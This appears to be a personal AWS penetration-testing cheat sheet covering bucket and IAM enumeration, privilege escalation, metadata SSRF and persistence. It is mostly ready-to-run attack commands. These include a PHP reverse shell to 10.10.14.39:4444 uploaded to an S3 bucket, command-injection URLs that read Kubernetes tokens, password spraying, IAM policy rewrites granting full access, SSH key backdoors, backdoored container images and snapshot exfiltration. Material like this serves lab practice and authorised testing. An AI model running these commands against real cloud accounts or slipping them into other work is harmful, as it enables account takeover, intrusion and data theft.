AWS

AWS Pentesting

Recon - AWS Eye

Found an account ID:

LogoAwseye - See Inside AWS Accountsawseye.com

S3 Recon

Logoawsome-websecurity-checklist/Mindmaps/S3-Bucket Recon.png at main · securitycipher/awsome-websecurity-checklistGitHub

s3enum

LogoGitHub - koenrh/s3enum: Fast and stealthy Amazon S3 bucket enumeration tool for pentesters.GitHub

lazys3

LogoGitHub - nahamsec/lazys3GitHub

BucketLoot

Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

LogoGitHub - redhuntlabs/BucketLoot: BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.GitHub

Bruteforce S3 buckets

LogoGitHub - koaj/aws-s3-bucket-wordlist: Most common AWS S3 bucket names.GitHub

regions.txt

us-west-1
us-west-2
us-east-1
us-east-2
cn-north-1
cn-northwest-1
eu-central-1
eu-north-1
eu-west-1
eu-west-2
eu-west-3
ap-northeast-1
ap-northeast-2
ap-northeast-3
ap-south-1
ap-southeast-1
ap-southeast-2
ca-central-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
ap-east-1
https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/master/list.txtraw.githubusercontent.com
ffuf -u "https://hlogistics-ENVIRONMENT.s3.REGION.amazonaws.com" -w "regions.txt:REGION" -w "list.txt:ENVIRONMENT" -mc 200,403 -v 2>/dev/null
LogoS3 Bucket Brute Force to BreachMedium

AWSBucketDump

LogoGitHub - jordanpotti/AWSBucketDump: Security Tool to Look For Interesting Files in S3 BucketsGitHub

CloudShovel

LogoGitHub - saw-your-packet/CloudShovel: A tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs.GitHub

Enumeration without authentication

LogoGitHub - Ty182/Tools_by_Tyler: A collection of custom tooling I've builtGitHub

Route 53 Misconfiguration

LogoGitHub - tarun776/ZoneScan: ZoneScan - AWS Route 53 NS Vulnerability Detection ToolGitHub

S3 Enumeration Basics

Check website source code - search for s3 url

By default, the AWS CLI includes prefix= (an empty prefix) and delimiter=/ in requests

Check for https://target.com.s3.amazonaws.com/?prefix=&delimiter=/

List bucket content - Anon

aws s3 ls s3://dev.target.com --no-sign-request

aws s3 ls s3://dev.target.com --no-sign-request --recursive

If you found an URL like http://target.s3.eu-west-2.amazonaws.com remove the s3.region.amazonaws.com part

aws s3 ls s3://target --no-sign-request

By default AWS cli tool interacts with s3.amazonaws.com . If you have another domain hosting it, you can use --endpoint-url option to point the tool to another domain.

List buckets - with profile

aws s3 ls --profile [profile-name]
aws s3api list-buckets --profile [profile-name]

Download one file

aws s3 cp s3://hl-it-admin/flag.txt .

Download all files

aws s3 cp s3://hl-it-admin/backup-2807/ . --recursive

download all of the bucket’s contents:

aws s3 sync s3://cybr-sensitive-data-bucket-<ID> ~/Downloads --profile victim

List the bucket ACL

aws s3api get-bucket-acl --bucket [bucket-name]

List & get objects

$ aws s3api list-objects-v2 --bucket [bucket-name] --profile [profile-name]
$ aws s3api get-object --bucket [bucket-name] --key [key] --profile [profile] ./key.txt

Bucket policy

Bucket Policies are attached directly to the bucket and define what actions are allowed or denied by which principal.

aws s3api get-bucket-policy --bucket [bucket-name]

More readable

aws s3api get-bucket-policy --bucket [bucket-name] | jq -r '.Policy' | sed 's/\\//g' | jq

Enumerate Lambda

One misconfiguration organizations often make with Lambda is including sensitive information in the environmental variables of the function

aws lambda list-functions --profile [profile]

Execute a lmabda function

$ aws lambda invoke --function-name  [FunctionName-Parameter] --payload '{}' output.txt --profile admin

EC2 acting as a reverse-proxy

SSRF / RCE
curl -s http://[EC2_IP]/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Enumerating EC2s

aws ec2 describe-instances --profile ec2-profile

Snapshots ?

aws --profile [profile-name] ec2 describe-snapshots --owner-id [account-id] --region us-west-2

Exploit snapshot

Snapshot found

$ aws --profile 0xss0rz ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  [snap-id]

  1. Launch a ec2 instance (create ssh key pair)

  2. Attach the snapshot created to the ec2 instance

Connect to the instance and mount the snapshot

$ lsblk
$ sudo mount /dev/xvdb1 /mnt

SecretsManager

aws iam get-user-policy --user-name [Username] --profile [Profile] --policy-name [Policy-name] 
{
    <-SNIP->            {
                "Action": [
                    "secretsmanager:GetSecretValue",
                    "secretsmanager:ListSecretVersionIds",
                    "secretsmanager:GetResourcePolicy",
                    "secretsmanager:DescribeSecret"
                ],
                "Resource": [
                    "arn:aws:secretsmanager:us-east-1:014498641740:secret:intro-to-secrets-manager-enumeration-1747034276755-password*",
                    "arn:aws:secretsmanager:us-east-1:014498641740:secret:intro-to-secrets-manager-enumeration-1747034276755-api-key*"
                ],
                "Effect": "Allow",
                "Sid": "AllowSecretsManagerActions"
            },
            {
                "Action": [
                    "secretsmanager:ListSecrets"
                ],
                "Resource": "*",
                "Effect": "Allow",
                "Sid": "AllowListSecrets"
            }
        ]
    }
}

$ aws secretsmanager list-secrets --query 'SecretList[*].[Name, Description, ARN]' --output json
# Lists the versions for a specific secret
# To issue this command, you must have secretsmanager:ListSecretVersionIds access
aws secretsmanager list-secret-version-ids --secret-id <value>

Get secret

aws secretsmanager get-secret-value --secret-id ext/cost-optimization

DynamoDB

List tables

$ aws --endpoint-url=http://localhost:4566 dynamodb list-tables --no-sign-request --region us-east-1

View Content

$ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users --no-sign-request --region us-east-1

Amazon RDS - Relational Database Service

Amazon RDS supports several database instances including:

  1. Amazon Aurora (port 3306)

  2. PostgreSQL (5432)

  3. MySQL (port 3306)

  4. MariaDB (port 3306)

  5. Oracle Database (port 1521)

  6. SQL Server (port 1433)

Bruteforce attack:

MySQL (3306)

The tmpdir variable provides further confirmation that this is an AWS RDS instance

SHOW GLOBAL VARIABLES like 'tmpdir';

AWS CLI

Keep track of profiles

cat ~/.aws/credentials

Configure a named profile

aws configure --profile [profile-name]
Logoconfigure — AWS CLI 2.31.14 Command Referencedocs.aws.amazon.com

Or

aws configure set aws_access_key_id [key-id] --profile [profile-name]
aws configure set aws_secret_access_key [key-id] --profile [profile-name]
aws configure set aws_session_token [token] --profile [profile-name]
aws sts get-caller-identity --profile [profile-name]

Or

$ export AWS_ACCESS_KEY_ID=<AWS_ACCESS_KEY_ID>
$ export AWS_SECRET_ACCESS_KEY=<AWS_SECRET_ACCESS_KEY>
$ export AWS_SESSION_TOKEN=<AWS_SESSION_TOKEN>
$ aws configure
LogoConfiguring environment variables for the AWS CLI - AWS Command Line InterfaceAWS Command Line Interface

Information about configured identity

aws sts get-caller-identity --profile [profile-name]
Logoget-caller-identity — AWS CLI 2.31.17 Command Referencedocs.aws.amazon.com

Stored Credentials

Windows

C:\Users\UserName\.aws

Linux

/home/UserName/.aws
cat credentials

Enumeration - Users

aws iam list-users

# With profile
aws iam list-users --profile [profile-name]

List the IAM groups that the specified IAM user belongs to :

aws iam list-groups-for-user --user-name [user-name]

List all manages policies that are attached to the specified IAM user :

aws iam list-attached-user-policies --user-name [user-name]

# With profile
aws iam list-attached-user-policies --user-name [user-name] --profile [profile-name]

aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy

aws iam get-policy-version --profile [☺profile] --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v1

Lists the names of the inline policies embedded in the specified IAM user :

aws iam list-user-policies --user-name [user-name]

Get policy

aws iam get-user-policy --user-name [user-name] --policy-name [policy-name]

Enumeration - Groups

IAM Groups

aws iam list-groups

All users in a group

aws iam get-group --group-name [group-name]

All managed policies that are attached to the specified IAM Group

aws iam list-attached-group-policies --group-name [group-name]

Names of the inline policies embedded in the specified IAM Group

aws iam list-group-policies --group-name [group-name]

Enumeration - Roles

List of IAM Roles

aws iam list-roles

All managed policies that are attached to the specified IAM role

aws iam list-attached-role-policies --role-name [ role-name]

Names of the inline policies embedded in the specified IAM role

aws iam list-role-policies --role-name [ role-name]

Enumeration - Policies

List of all iam policies

aws iam list-policies

Information about the specified managed policy

aws iam get-policy --policy-arn [policy-arn]

# With profile
aws iam get-policy --policy-arn [policy-arn] --profile [profile-name]

Information about the versions of the specified manages policy

aws iam list-policy-versions --policy-arn [policy-arn]

Information about the specified version of the specified managed policy

aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]
# Example
aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4

# With profile
aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id] --profile [profile-name]

One of the permissions is iam:CreatePolicyVersion ? Use this to create a new version of the attached policy with privileged access

aws iam create-policy-version --policy-arn [policy-arn] --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default --profile [profile-name]

Specified inline policy document that is embedded on the specified IAM user / group / role

aws iam get-user-policy --user-name user-name --policy-name [policy-name]
aws iam get-group-policy --group-name group-name --policy-name [policy-name]
aws iam get-role-policy --role-name role-name --policy-name [policy-name]

Enumeration - Cloud Services (EC2, S3 etc.) in an Organization AWS Account

aws ec2 describe-instances --profile [profile-name]
aws ec2 describe-instances --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[Tags[?Key==`Name`].Value | [0],InstanceId,Platform,State.Name,PrivateIpAddress,PublicIpAddress,InstanceType,PublicDnsName,KeyName]'

This might not return any results if you aren't in the same region. -> Run pacu ec2__enum module

Enumeration - Get Bucket Policy

aws s3api get-bucket-policy --bucket [bucket-name]
# Example
# aws s3api get-bucket-policy --bucket hl-it-admin

DynamoDB

aws dynamodb list-tables

aws dynamodb describe-table --table [table-name]

CodeCommit

aws codecommit list-repositories

aws codecommit get-repository --repository-name [repo-name]

# List branches
aws codecommit list-branches --repository-name [repo-name]

# Get details
aws codecommit get-branch --repository-name [repo-name] --branch-name dev

# Get the parent commit
aws codecommit get-commit --repository-name [repo-name] --commit-id [commit-id]

# Find the files that changed between commits
aws codecommit get-differences --repository-name [repo-name] --before-commit-specifier [parent-id] --after-commit-specifier [commit-id]

# Download file
aws codecommit get-file --repository-name [repo-name] --commit-specifier [commit-id] --file-path [file-path]

SSRF

SSRF / RCE

EC2 - Get Password

aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem

Spray AWS Console IAM Logins

LogoGitHub - WhiteOakSecurity/GoAWSConsoleSpray: Tool to spray AWS Console IAM LoginsGitHub
./GoAWSConsoleSpray -a ACCOUNTID -u ../../users -p ../../passwords

To get the ACCOUNTID , run aws sts get-caller-identity with a known account

Pacu

$ pip3 install -U pacu
$ pacu
LogoGitHub - RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.GitHub

Setting the initial user access key

set_keys

Permission of current logged-in user

exec iam__enum_permissions
whoami

Bruteforce IAM permissions

run iam__bruteforce_permissions

Enumerate ec2 instance and get the public ip addresses

exec ec2__enum
data EC2

Enumerate privilege escalation permission and exploit it

exec iam__privesc_scan
LogoBeginner's Guide to hunting for AWS IAM Privilege Escalations with Pacu© PWNED LABS CYBERSECURITY TRAINING SERVICES - FZCO

Subdomain Takeover

AWS Elastic Beanstalk

LogoUsing PD tools to find my first subdomain takeover — ProjectDiscovery BlogProjectDiscovery
DNS (53)

Privilege escalation opportunities in IAM configurations

LogoGitHub - tenable/EscalateGPT: An AI-powered tool for discovering privilege escalation opportunities in AWS IAM configurations.GitHub

IAM Privilege escalation

List inline policies, attached policies and group policies

LogoAWS IAM Privilege Escalation Labs - CybrCybr
LogoAWS IAM Privilege Escalation Techniques - Hacking The Cloudhackingthe.cloud
LogoAWS-IAM-Privilege-Escalation/README.md at master · RhinoSecurityLabs/AWS-IAM-Privilege-EscalationGitHub
LogoGitHub - RhinoSecurityLabs/AWS-IAM-Privilege-Escalation: A centralized source of all AWS IAM privilege escalation methods released by Rhino Security Labs.GitHub

IAM Enumeration Tools

PMapper

LogoGitHub - nccgroup/PMapper: A tool for quickly evaluating IAM permissions in AWS.GitHub

CloudPEASS

LogoGitHub - carlospolop/CloudPEASSGitHub
python3 AWSPEAS.py --profile <AWS_PROFILE> --region <AWS_REGION>

IAMActionHunter

LogoGitHub - RhinoSecurityLabs/IAMActionHunter: An AWS IAM policy statement parser and query tool.GitHub

IAMFinder

LogoGitHub - prisma-cloud/IAMFinder: IAMFinder enumerates and finds users and IAM roles in a target AWS account.GitHub

EnumerateIAM

LogoGitHub - andresriancho/enumerate-iam: Enumerate the permissions associated with AWS credential setGitHub
python3 enumerate-iam.py --access-key [access_key] --secret-key [secret_key] > results.txt

aws_iam_enum

LogoGitHub - unklerunkle/aws_iam_enum: python script to automate the redundancy of some basic aws iam commandsGitHub
python3 iam-enum.py --user-name [username] --profile [profile]

aws_escalate.py

LogoSecurity-Research/tools/aws-pentest-tools/aws_escalate.py at master · RhinoSecurityLabs/Security-ResearchGitHub
python3 aws_escalate.py --user-name [username] --access-key-id [access_key] --secret-key [secret_key]

Pacu

Multiple privesc vectors

Multiple privesc vectors in a single policy

iam:CreateAccessKey

LogoAWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

An attacker with the iam:CreateAccessKey permission on other users can create an access key ID and secret access key belonging to another user in the AWS environment

aws iam create-access-key --user-name target_user
$ aws iam create-access-key --user-name [Victim-Username] --profile [profile-name] --output text | tee creds.txt

iam:CreateLoginProfile

LogoAWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

An attacker with the iam:CreateLoginProfile permission on other users can create a password to use to login to the AWS console on any user that does not already have a login profile setup.

aws iam create-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]

arn:aws:iam::[Account_ID]:user/[Username]

You can now login as the victim into the AWS console

https://signin.aws.amazon.com/signinsignin.aws.amazon.com

iam:UpdateLoginProfile

aws iam update-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]

You can now login as the victim into the AWS console - See iam:CreateAccessKey

iam:CreatePolicyVersion

LogoAWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

Create a new version of an IAM policy that they have access to.

aws iam create-policy-version --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy --policy-document file://path/to/administrator/policy.json --set-as-default

administrator/policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

iam:SetDefaultPolicyVersion

aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2

Where “v2” is the policy version with the most privileges available.

Example: CloudGOAT - iam_privesc_by_rollback

With Pacu:

iam:AddUserToGroup

aws iam add-user-to-group --group-name [group-name@ --user-name [username] --profile [profile]

iam:AttachUserPolicy

LogoAWS managed policies - AWS Managed PolicyAWS Managed Policy
aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

If attaching AdministratorAccess fails, try to attach another dangerous permission such as SecretsManagerReadWrite

aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite

iam:AttachGroupPolicy

aws iam attach-group-policy --group-name [group_attached_to_user] --policy-arn arn:aws:iam::aws:policy/SecretsManager

Also try with AdministratorAccess - See iam:AttachUserPolicy

iam:PutUserPolicy

Create a policy document policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}
aws iam put-user-policy --user-name [username] --policy-name test --policy-document file://policy.json

Check if the policy is in place:

$ aws iam list-user-policies --user-name [username]
$ aws iam get-user-policy --user-name [username] --policy-name test

iam:PutGroupPolicy

Create policy.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]

Upload the policy to your group

aws iam put-group-policy --group-name [group] --policy-name admin --policy-document file://policy.json

iam:AttachRolePolicy

LogoAWS IAM Privilege Escalation – Methods and MitigationRhino Security Labs

Find a role you can assume: "Action": "sts:AssumeRole"

aws iam list-roles

Attach Role Policy

aws iam attach-role-policy --role-name [role_you_can_assume] --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess

iam:PutRolePolicy

Find a role you can assume - See iam:AttachRolePolicy

Create policy.json

{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Allow",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }

Put the role

aws iam put-role-policy --role-name [role_you_can_assume] --policy-name secretsaccess --policy-document file://policy.json

sts:AssumeRole

LogoAWS Pentest Series Privilige Escalation over IAM (assumerole)Medium

List of IAM roles

aws iam list-roles

Retrieve trust relationship between role and user

aws2 iam get-role --role-name [role-name]

List managed policies attached to the specified role

aws iam list-attached-role-policies --role-name [role-name]

Retrieve information about the specified version of the managed policy

aws iam get-policy-version --policy-arn [policy-arn] --version-id [vid]

Assume role - retrieve temporary security credentials of assumed role

aws sts assume-role --role-arn [role-arn] --role-session-name [sessionname]

Use the credentials

$ export AWS_ACCESS_KEY_ID=[access_key]
$ export AWS_SECRET_ACCESS_KEY=[secret_key]
$ export AWS_SESSION_TOKEN=[session_token]
$ aws sts get-caller-identity

lambda:UpdateFunctionConfiguration

LogoAWS IAM Privilege Escalation - Methods and Mitigation - Part 2Rhino Security Labs

Allow to attach a layer to a function

aws lambda update-function-code --function-name [my-function] --zip-file fileb://my-function.zip

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction

$ aws lambda create-function --function-name [function-name] --runtime python3.7 --zipe-file fileb://my-function.zip --handle [my-function.handler] --role [role-arn] --region [region]
$ aws lambda invoke --function-name [function-name] response.json --region [region]

IAM Security Assessment

LogoGitHub - salesforce/cloudsplaining: Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report.GitHub

Metadata

Unauthorized Access to Metadata and User Data

LogoGitHub - Lu3ky13/Unauthorized-Access-to-Metadata-and-User-Data-like-CTF: Unauthorized Access to Metadata and User Data like CTFGitHub

AWS Enumerator

LogoGitHub - shabarkin/aws-enumerator: The AWS Enumerator was created for service enumeration and info dumping for investigations of penetration testers during Black-Box testing. The tool is intended to speed up the process of Cloud review in case the security researcher compromised AWS Account Credentials.GitHub
./aws-enumerator cred -aws_access_key_id AKIA***********XKU -aws_region us-west-2 -aws_secret_access_key kIm6m********************5JPF


./aws-enumerator enum --services all

# Permissions
./aws-enumerator dump --services dynamodb

S3 Misconfiguration - Permissions

LogoHacking misconfigured AWS S3 buckets: A complete guideIntigriti

S3Scanner

LogoGitHub - sa7mon/S3Scanner: Scan for misconfigured S3 buckets across S3-compatible APIs!GitHub

Checkov

Logocheckovwww.checkov.io

Nuclei Templates

LogoAWS Cloud Security Config Review using Nuclei Templates — ProjectDiscovery BlogProjectDiscovery

AWS Extender - Burp Extension

LogoGitHub - VirtueSecurity/aws-extender: AWS Extender (Cloud Storage Tester) is a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure.GitHub

List Permissions

aws s3 ls s3://{BUCKET_NAME} --no-sign-request

Read Permissions

aws s3api get-object --bucket {BUCKET_NAME} --key archive.zip ./OUTPUT --no-sign-request

Download Permissions

aws s3 cp s3://{BUCKET_NAME}/intigriti.txt ./ --no-sign-request

Write Permissions

aws s3 cp intigriti.txt s3://{BUCKET_NAME}/intigriti-ac5765a7-1337-4543-ab45-1d3c8b468ad3.txt --no-sign-request

Make sure to use a filename with a non-trivial name to prevent any disruption

Upload a shell

$ echo "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.10.14.39/4444 0>&1 \"');?>" > rs.php
$ aws s3 cp rs.php s3://adserver/rs.php --endpoint-url=http://s3.bucket.htb --no-sign-request

upload: ./rs.php to s3://adserver/rs.php 
$ curl http://bucket.htb/rs.php

Read Permissions on ACL

aws s3api get-bucket-acl --bucket {BUCKET_NAME} --no-sign-request
aws s3api get-object-acl --bucket {BUCKET_NAME} --key index.html --no-sign-request

Write Permissions on ACL

aws s3api put-bucket-acl --bucket {BUCKET_NAME} --grant-full-control emailaddress={EMAIL} --no-sign-request

You do not have to always necessarily change an ACL to test for write permissions if read permissions are enabled. You can simply check the "Grants" property in the response to a read operation and verify if any unauthorized users are allowed to perform the write operation!

S3 Versioning

curl -sI http://target.s3.region.com/statis/js/auth.js

# Look for x-amz-id header
aws s3api get-bucket-versioning --bucket {BUCKET_NAME} --no-sign-request

List object versions.

aws s3api list-object-versions --bucket [bucket-name] --query "Versions[?VersionId!='null']" --no-sign-request
aws s3api get-object --bucket [bucket-name] --key "[key-name]" --version-id "[version-id]" filename.js --no-sign-request

S3 - Shadow Resources

LogoBucket Monopoly: Breaching AWS Accounts Through Shadow ResourcesAqua

Security Groups - Segmentation

LogoMy AWS “Segmentation Test” Methodology for Pentesters v1.0Medium
LogoGitHub - SherifTalaat/AWS-SG-Analyzer: Python script to analyze and extract all Security Groups informationGitHub

AWS Attack Path Management Tool

LogoGitHub - hotnops/apeman: AWS Attack Path Management Tool - Walking on the MoonGitHub

Persistence - IAM Role Anywhere

An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account

LogoMyScripts/AWS/setup_roles_anywhere.sh at main · adanalvarez/MyScriptsGitHub
LogoHow Attackers Can Abuse IAM Roles Anywhere for Persistent AWS AccessMedium

VPC - Virtual Private Cloud

Enumeration

Describe aboute VPCs

aws ec2 describe-vpcs

Describe about subnets

aws ec2 describe-subnets

Describe about route table

aws ec2 describe-route-tables

Describe about Network ACL (NACL)

aws ec2 describe-network-acls

Lateral Movement / Pivoting

LogoAWS - VPC & Networking Basic Information - HackTricks Cloudcloud.hacktricks.wiki

Describes all VPC Peering Connections 

aws ec2 describe-vpc-peering-connections

Describe about Subnet of the specified VPC :

aws ec2 describe-subnets --filters "Name=vpc-id, Values=[VpcID]"

Describe about Route Table of the specified Subnet 

aws ec2 describe-route-tables --filters "Name=vpc-id, Values=[VpcID]"

Describe about Network ACL of the specified VPC

aws ec2 describe-network-acls --filters "Name=vpc-id, Values=[VpcID]"

Describe about EC2 Instances In the specified VPC

aws ec2 describe-instances --filters "Name=vpc-id, Values=[VpcID]"

Describe about EC2 Instances In the specified Subnet

aws ec2 describe-instances --filters "Name=subnet-id, Values=[SubnetID]"

EC2 - Elastic Compute Cloud

Enumeration

Describes the information about all instances

aws ec2 describe-instances

Describes the information about specified instance

aws ec2 describe-instances --instance-ids [instace-id]

Describes the information about UserData Attribute of the specified Instance

aws ec2 describe-instance-attribute --atribute userData --instance-id [instance-id]

Describes the infroamtion about IAM instance profile associations

aws ec2 describe-iam-instance-profile-associations

Exploitation

SSRF/RCE

SSRF / RCE

AWS Metadata

  • IMDV1

curl http://169.254.169.254/latest/meta-data/

  • IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

AWS Userdata

  • IMDV1

curl http://169.254.169.254/latest/user-data/

  • IMDV2

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/

EC2StepShell

LogoGitHub - saw-your-packet/EC2StepShell: EC2StepShell is an AWS post-exploitation tool for getting high privileges reverse shells in public or private EC2 instances.GitHub

Persistence

Generate SSH key pair

ssh-keygen

On EC2 instance, add private key to user ssh directory

echo "ssh_public_key" >> /home/user/.ssh/authorized_keys

Access EC2 using ssh backdoor key

ssh -i "ssh_private_key" user@ec2_public_ip

Privilege Escalation

LogoAWS - EC2 Privesc - HackTricks Cloudcloud.hacktricks.wiki

Lambda Function

Enumeration

List of all lambda functions

aws lambda list-functions

Retrieve the information about the specified lambda function

aws lambda get-function --function-name [function-name]

Retrieve the policy information about the specified lambda function

aws lambda get-policy --function-name [function-name]

Retrieve the event source mapping information about the specified lambda function

aws lambda list-event-source-mappings --function-name [function-name]

List of all the layers (dependencies) in aws account

aws lambda list-layers

Retrieve the full information about the specified layer name

aws lambda get-layer-version --layer-name [layername] --version-number [version-number]

List of all the REST APIs 

aws apigateway get-rest-apis

Get the information about specified API

aws apigateway get-rest-api --rest-api-id [api-id]

List information about a collection of resources

aws apigateway get-resources --rest-api-id [api-id]

Get information about the specified resource

aws apigateway get-resource --rest-api-id [api-id] --resource-id [resource-id]

Get the method information for the specified resource

aws apigateway get-method --rest-api-id [api-id] --resource-id [resource-id] --http-methode [method]

List of all stages for a REST API

aws apigateway get-stages --rest-api-id [api-id]

Get the information about specified API's stage

aws apigateway get-api-keys --include-values

Get the information about a specified API key

aws apigateway get-api-key --api-key [api-key]

Credential Access

RCE

Lambda function vulnerable to command injection

Command Injection
https://vulnerable.lambda.amazonaws.com/prod/system?cmd=id
https://vulnerable.lambda.amazonaws.com/prod/system?cmd=env

SSRF

https://vulnerable.lambda.amazonaws.com/prod/vuln?url=http://localhost:9001/2025-05-15/runtime/invocation/next
https://vulnerable.lambda.amazonaws.com/prod/vuln?url=file://proc/self/environ

Using CLI

Environment variable:

aws lambda get-function --function-name [function-name]

Persistence

lambda:UpdateFunctionCode

PrivEsc

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction

Containers

3 categories:

  • Registry: store and manage container images: ECR (Elastic Container Registry)

  • Orchestration: when and where containers run: ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service)

  • Compute: run containers: Fargate (servless compute engine) and EC2

Enumeration

ECR

Repositories in the container registry

aws ecr describe-repositories

Information about the repo policy

aws ecr get-repository-policy --repository-name [repo-name]

List all images in the specified repository

aws ecr list-images --repository-name [repo-name]

Information about a container image

aws ecr describe-images --repository-name [repo-name] --image-ids imageTag=[imageTag]

ECS

List all ECS clusters

aws ecs list-clusters

Information about specified cluster

aws ecs describe-clusters --cluster [cluster-name]

List all services in the specified cluster

aws ecs list-services --cluster [cluster-name]

Information about a specified service

aws ecs describe-services --cluster [cluster-name] --services [service-name]

List all tasks in the specified cluster

aws ecs describe-tasks --cluster [cluster-name] --tasks [task-arn]

List all containers in the specified cluster

aws ecs list-container-instances --cluster [cluster-name]

EKS

List all EKS clusters

aws eks list-clusters

Information about a specified cluster

aws eks describe-cluster --name [cluster-name]

List of all node groups in a specified cluster

aws eks list-nodegroups --cluster-name [cluster-name]

Information about a specified node group in a cluster

aws eks describe-nodegroup --cluster-name [cluster-name] --nodegroup-name [node-group]

List of all fargate in a specified cluster

aws eks list-fargate-profiles --cluster-name [cluster-name]

Information about a specific fargate profile in a cluster

aws eks describe-fargate-profile --cluster-name [cluster-name] --fargate-profile-name [profile-name]

Initial Access

RCE - Command injection

  • List of all secret in EKS vulnerable container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=ls%20%20%20/var/run/secrets/kubernetes.io/serviceaccount

  • Get the secret information from running EKS vulnerable container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=cat%20%20%20/var/run/secrets/kubernetes.io/serviceaccount/token

Persistence

Authenticate docker daemon to ECR

aws ecr get-login-password --region [region] | docker login --username AWS --password-stdin [ECR-Addr]

Build backdoored docker image

docker build -t [Image-name] .

Tag the docker image

docker tag [Image-name] [ECR-addr]:[Image-name]

Push the docker image to AWS Container Registry

docker push [ECR-addr]:[Image-name]

S3 - Simple Storage Service

Enumeration

List of all the bucket in the AWS account

aws s3api list-buckets

Information about specified bucket ACLs

aws s3api get-bucket-acl --bucket [bucket-name]

Information about specified bucket policy

aws s3api get-bucket-policy --bucket [bucket-name]

Retrieve eh Public Access Block configuration for an Amazon S3 bucket

aws s3api get-public-access-block --bucket [bucket-name]

List of all the objects in specified bucket

aws s3api list-objects --bucket [bucket-name]

ACLs information about the specified object

aws s3api get-object-acl --bucket [bucket-name] --key [object-name]

RDS - Relational Database Service

Enumeration

Information about the clusters in RDS

aws rds describe-db-clusters

Information about the database instances in RDS

aws rds describe-db-instances

Information about the subnet group in RDS

aws rds describe-db-subnet-groups

Information about the database security groups in RDS

aws rds describe-db-security-groups

Information about the database proxies in RDS

aws rds describe-db-proxies

Data Exfiltration

Password Based

mysql -h hostname -u username -P port -p password
MySQL (3306)

IAM Based Authentication (token)

Get the database instance connection temporary token from the RDS endpoint

aws rds generate-db-auth-token --hostname [hostname] --port [port] --username [username] --region [region]

Connect to mysql using temporary token

mysql -h hostname -u username -P port --enable-cleartext-plugin --password=$TOKEN

Snapshots

Public snapshots from single RDS database instances that belong to AWS account ID

aws rds describe-db-snapshots --snapshot-type public --include-public --region us-east-1 | grep [account-ID]

Public snapshots from RDS database cluster instances

aws rds describe-db-cluster-snapshots --snapshot-type public --include-public --region us-east-1 | grep [account-ID]

The snapshot can be restored. From the Actions menuin GUI, select Restore snapshot

EBS - Elastic Block Store

A block storage system used to store persistent data. used for EC2 instances.

Enumeration

Information about EBS volumes

aws ec2 describe-volumes

All available EBS snapshots

aws ec2 describe-snapshots --owner-ids self
aws ec2 describe-snapshots --owner-ids [☺account-id] --region [region]

Create volume permissions

aws ec2 describe-snapshot-attribute --attribute createVolumePermission --snapshot-id [snapshot-id] --region [region]

The value of Group is set to all. This reveals that it is a publicly accessible snapshot and any AWS user will be able to create a volume from this public snapshot into their AWS Account.

Enumerate public snapshots

aws ec2 describe-snapshots --owner-id self --restorable-by-user-ids all --no-paginate --region [region]

Data Exfiltation

Create a snapshot of the specified volume

aws ec2 create-snapshot --volume-id [volume-id] --description "exfiltration"

Describe all the available EBS snapshots

aws ec2 describe-snapshots --owner-ids self

Create a volume from snapshots

